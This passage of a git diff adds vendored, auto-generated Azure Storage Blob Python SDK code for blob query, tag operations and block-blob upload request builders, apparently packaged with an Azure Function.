response.headers.get('x-ms-lease-status')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges')) + 
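+ # A successful query streams the filtered rows back in the response body,
+ # while the blob's standard properties arrive in the headers deserialized
+ # here. Illustrative use against a headerless CSV blob via the public API
+ # (placeholder names; positional columns are addressed as _1, _2, ...):
+ #
+ #     reader = blob_client.query_blob("SELECT _2 FROM BlobStorage")
+ #     data = reader.readall()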
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-blob-content-md5']=self._deserialize('bytearray', response.headers.get('x-ms-blob-content-md5')) + + deserialized = response.stream_download(self._client._pipeline) + + if response.status_code == 206: + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding')) + response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control')) + response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition')) + response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time')) + response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress')) + response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', 
response.headers.get('x-ms-version')) + response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-blob-content-md5']=self._deserialize('bytearray', response.headers.get('x-ms-blob-content-md5')) + + deserialized = response.stream_download(self._client._pipeline) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + query.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def get_tags( + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + snapshot=None, # type: Optional[str] + version_id=None, # type: Optional[str] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> "_models.BlobTags" + """The Get Tags operation enables users to get the tags associated with a blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword comp: comp. Default value is "tags". Note that overriding this default value may + result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: BlobTags, or the result of cls(response) + :rtype: ~azure.storage.blob.models.BlobTags + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.BlobTags"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "tags") # type: str + + _if_tags = None + _lease_id = None + if modified_access_conditions is not None: + _if_tags = modified_access_conditions.if_tags + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_get_tags_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + snapshot=snapshot, + version_id=version_id, + if_tags=_if_tags, + lease_id=_lease_id, + template_url=self.get_tags.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('BlobTags', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_tags.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def set_tags( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + version_id=None, # type: Optional[str] + transactional_content_md5=None, # type: Optional[bytearray] + transactional_content_crc64=None, # type: Optional[bytearray] + request_id_parameter=None, # type: Optional[str] + tags=None, # type: Optional["_models.BlobTags"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Set Tags operation enables users to set tags on a blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. 
Default value is None. + :type transactional_content_md5: bytearray + :param transactional_content_crc64: Specify the transactional crc64 for the body, to be + validated by the service. Default value is None. + :type transactional_content_crc64: bytearray + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param tags: Blob tags. Default value is None. + :type tags: ~azure.storage.blob.models.BlobTags + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword comp: comp. Default value is "tags". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "tags") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _if_tags = None + _lease_id = None + if modified_access_conditions is not None: + _if_tags = modified_access_conditions.if_tags + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if tags is not None: + _content = self._serialize.body(tags, 'BlobTags', is_xml=True) + else: + _content = None + + request = build_set_tags_request( + url=self._config.url, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + timeout=timeout, + version_id=version_id, + transactional_content_md5=transactional_content_md5, + transactional_content_crc64=transactional_content_crc64, + request_id_parameter=request_id_parameter, + if_tags=_if_tags, + lease_id=_lease_id, + template_url=self.set_tags.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [204]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_tags.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_block_blob_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_block_blob_operations.py new file mode 100644 index 0000000..e11d307 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_block_blob_operations.py @@ -0,0 +1,1649 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +import datetime +from typing import TYPE_CHECKING + +from msrest import Serializer + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import HttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator import distributed_trace + +from .. import models as _models +from .._vendor import _convert_request, _format_url_section + +if TYPE_CHECKING: + # pylint: disable=unused-import,ungrouped-imports + from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union + T = TypeVar('T') + ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]] + +_SERIALIZER = Serializer() +_SERIALIZER.client_side_validation = False +# fmt: off + +def build_upload_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + blob_type = kwargs.pop('blob_type', "BlockBlob") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_type = kwargs.pop('content_type', None) # type: Optional[str] + content_length = kwargs.pop('content_length') # type: int + timeout = kwargs.pop('timeout', None) # type: Optional[int] + transactional_content_md5 = kwargs.pop('transactional_content_md5', None) # type: Optional[bytearray] + blob_content_type = kwargs.pop('blob_content_type', None) # type: Optional[str] + blob_content_encoding = kwargs.pop('blob_content_encoding', None) # type: Optional[str] + blob_content_language = kwargs.pop('blob_content_language', None) # type: Optional[str] + blob_content_md5 = kwargs.pop('blob_content_md5', None) # type: Optional[bytearray] + blob_cache_control = kwargs.pop('blob_cache_control', None) # type: Optional[str] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + blob_content_disposition = kwargs.pop('blob_content_disposition', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + tier = kwargs.pop('tier', None) # type: Optional[Union[str, "_models.AccessTierOptional"]] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + blob_tags_string = kwargs.pop('blob_tags_string', None) # type: Optional[str] + immutability_policy_expiry = kwargs.pop('immutability_policy_expiry', None) # type: Optional[datetime.datetime] + immutability_policy_mode = kwargs.pop('immutability_policy_mode', None) # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold = kwargs.pop('legal_hold', None) # type: Optional[bool] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-blob-type'] = _SERIALIZER.header("blob_type", blob_type, 'str') + if transactional_content_md5 is not None: + _header_parameters['Content-MD5'] = _SERIALIZER.header("transactional_content_md5", transactional_content_md5, 'bytearray') + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + if blob_content_type is not None: + _header_parameters['x-ms-blob-content-type'] = _SERIALIZER.header("blob_content_type", blob_content_type, 'str') 
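+ # Each optional blob property or precondition is mapped onto its x-ms-* (or
+ # standard HTTP) header only when the caller supplied it, so omitted values
+ # never override service-side defaults. A minimal caller-side sketch via the
+ # public API (placeholder names; small payloads take this single Put Blob
+ # path):
+ #
+ #     from azure.storage.blob import BlobClient, ContentSettings
+ #     blob = BlobClient.from_connection_string(conn_str, "mycontainer", "hello.txt")
+ #     blob.upload_blob(b"hello world", overwrite=True,
+ #         content_settings=ContentSettings(content_type="text/plain"))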
+ if blob_content_encoding is not None: + _header_parameters['x-ms-blob-content-encoding'] = _SERIALIZER.header("blob_content_encoding", blob_content_encoding, 'str') + if blob_content_language is not None: + _header_parameters['x-ms-blob-content-language'] = _SERIALIZER.header("blob_content_language", blob_content_language, 'str') + if blob_content_md5 is not None: + _header_parameters['x-ms-blob-content-md5'] = _SERIALIZER.header("blob_content_md5", blob_content_md5, 'bytearray') + if blob_cache_control is not None: + _header_parameters['x-ms-blob-cache-control'] = _SERIALIZER.header("blob_cache_control", blob_cache_control, 'str') + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if blob_content_disposition is not None: + _header_parameters['x-ms-blob-content-disposition'] = _SERIALIZER.header("blob_content_disposition", blob_content_disposition, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if tier is not None: + _header_parameters['x-ms-access-tier'] = _SERIALIZER.header("tier", tier, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if blob_tags_string is not None: + _header_parameters['x-ms-tags'] = _SERIALIZER.header("blob_tags_string", blob_tags_string, 'str') + if immutability_policy_expiry is not None: + _header_parameters['x-ms-immutability-policy-until-date'] = _SERIALIZER.header("immutability_policy_expiry", immutability_policy_expiry, 'rfc-1123') + if immutability_policy_mode is not None: + _header_parameters['x-ms-immutability-policy-mode'] = _SERIALIZER.header("immutability_policy_mode", immutability_policy_mode, 'str') + if legal_hold is not None: + _header_parameters['x-ms-legal-hold'] = _SERIALIZER.header("legal_hold", legal_hold, 'bool') + if content_type is not None: + _header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", 
+ url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_put_blob_from_url_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + blob_type = kwargs.pop('blob_type', "BlockBlob") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_length = kwargs.pop('content_length') # type: int + copy_source = kwargs.pop('copy_source') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + transactional_content_md5 = kwargs.pop('transactional_content_md5', None) # type: Optional[bytearray] + blob_content_type = kwargs.pop('blob_content_type', None) # type: Optional[str] + blob_content_encoding = kwargs.pop('blob_content_encoding', None) # type: Optional[str] + blob_content_language = kwargs.pop('blob_content_language', None) # type: Optional[str] + blob_content_md5 = kwargs.pop('blob_content_md5', None) # type: Optional[bytearray] + blob_cache_control = kwargs.pop('blob_cache_control', None) # type: Optional[str] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + blob_content_disposition = kwargs.pop('blob_content_disposition', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + tier = kwargs.pop('tier', None) # type: Optional[Union[str, "_models.AccessTierOptional"]] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + source_if_modified_since = kwargs.pop('source_if_modified_since', None) # type: Optional[datetime.datetime] + source_if_unmodified_since = kwargs.pop('source_if_unmodified_since', None) # type: Optional[datetime.datetime] + source_if_match = kwargs.pop('source_if_match', None) # type: Optional[str] + source_if_none_match = kwargs.pop('source_if_none_match', None) # type: Optional[str] + source_if_tags = kwargs.pop('source_if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + source_content_md5 = kwargs.pop('source_content_md5', None) # type: Optional[bytearray] + blob_tags_string = kwargs.pop('blob_tags_string', None) # type: Optional[str] + copy_source_blob_properties = kwargs.pop('copy_source_blob_properties', None) # type: Optional[bool] + copy_source_authorization = kwargs.pop('copy_source_authorization', None) # type: Optional[str] + copy_source_tags = kwargs.pop('copy_source_tags', None) # type: Optional[Union[str, "_models.BlobCopySourceTags"]] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + 
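+ # Unlike the asynchronous Copy Blob operation, Put Blob From URL commits the
+ # whole blob from the source URL within this single synchronous request, so
+ # the response already reflects the final blob. A sketch via the public API
+ # (account, container and SAS token are placeholders):
+ #
+ #     dst = BlobClient.from_connection_string(conn_str, "mycontainer", "copy.bin")
+ #     dst.upload_blob_from_url(
+ #         "https://account.blob.core.windows.net/src/src.bin?<sas>")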
if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-blob-type'] = _SERIALIZER.header("blob_type", blob_type, 'str') + if transactional_content_md5 is not None: + _header_parameters['Content-MD5'] = _SERIALIZER.header("transactional_content_md5", transactional_content_md5, 'bytearray') + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + if blob_content_type is not None: + _header_parameters['x-ms-blob-content-type'] = _SERIALIZER.header("blob_content_type", blob_content_type, 'str') + if blob_content_encoding is not None: + _header_parameters['x-ms-blob-content-encoding'] = _SERIALIZER.header("blob_content_encoding", blob_content_encoding, 'str') + if blob_content_language is not None: + _header_parameters['x-ms-blob-content-language'] = _SERIALIZER.header("blob_content_language", blob_content_language, 'str') + if blob_content_md5 is not None: + _header_parameters['x-ms-blob-content-md5'] = _SERIALIZER.header("blob_content_md5", blob_content_md5, 'bytearray') + if blob_cache_control is not None: + _header_parameters['x-ms-blob-cache-control'] = _SERIALIZER.header("blob_cache_control", blob_cache_control, 'str') + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if blob_content_disposition is not None: + _header_parameters['x-ms-blob-content-disposition'] = _SERIALIZER.header("blob_content_disposition", blob_content_disposition, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if tier is not None: + _header_parameters['x-ms-access-tier'] = _SERIALIZER.header("tier", tier, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + if source_if_modified_since is not None: + _header_parameters['x-ms-source-if-modified-since'] = _SERIALIZER.header("source_if_modified_since", source_if_modified_since, 'rfc-1123') + if source_if_unmodified_since is not None: + _header_parameters['x-ms-source-if-unmodified-since'] = _SERIALIZER.header("source_if_unmodified_since", source_if_unmodified_since, 'rfc-1123') + if source_if_match is 
not None: + _header_parameters['x-ms-source-if-match'] = _SERIALIZER.header("source_if_match", source_if_match, 'str') + if source_if_none_match is not None: + _header_parameters['x-ms-source-if-none-match'] = _SERIALIZER.header("source_if_none_match", source_if_none_match, 'str') + if source_if_tags is not None: + _header_parameters['x-ms-source-if-tags'] = _SERIALIZER.header("source_if_tags", source_if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if source_content_md5 is not None: + _header_parameters['x-ms-source-content-md5'] = _SERIALIZER.header("source_content_md5", source_content_md5, 'bytearray') + if blob_tags_string is not None: + _header_parameters['x-ms-tags'] = _SERIALIZER.header("blob_tags_string", blob_tags_string, 'str') + _header_parameters['x-ms-copy-source'] = _SERIALIZER.header("copy_source", copy_source, 'str') + if copy_source_blob_properties is not None: + _header_parameters['x-ms-copy-source-blob-properties'] = _SERIALIZER.header("copy_source_blob_properties", copy_source_blob_properties, 'bool') + if copy_source_authorization is not None: + _header_parameters['x-ms-copy-source-authorization'] = _SERIALIZER.header("copy_source_authorization", copy_source_authorization, 'str') + if copy_source_tags is not None: + _header_parameters['x-ms-copy-source-tag-option'] = _SERIALIZER.header("copy_source_tags", copy_source_tags, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_stage_block_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "block") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_type = kwargs.pop('content_type', None) # type: Optional[str] + block_id = kwargs.pop('block_id') # type: str + content_length = kwargs.pop('content_length') # type: int + transactional_content_md5 = kwargs.pop('transactional_content_md5', None) # type: Optional[bytearray] + transactional_content_crc64 = kwargs.pop('transactional_content_crc64', None) # type: Optional[bytearray] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + _query_parameters['blockid'] = _SERIALIZER.query("block_id", block_id, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + if transactional_content_md5 is not None: + _header_parameters['Content-MD5'] = _SERIALIZER.header("transactional_content_md5", transactional_content_md5, 'bytearray') + if transactional_content_crc64 is not None: + _header_parameters['x-ms-content-crc64'] = _SERIALIZER.header("transactional_content_crc64", transactional_content_crc64, 'bytearray') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = 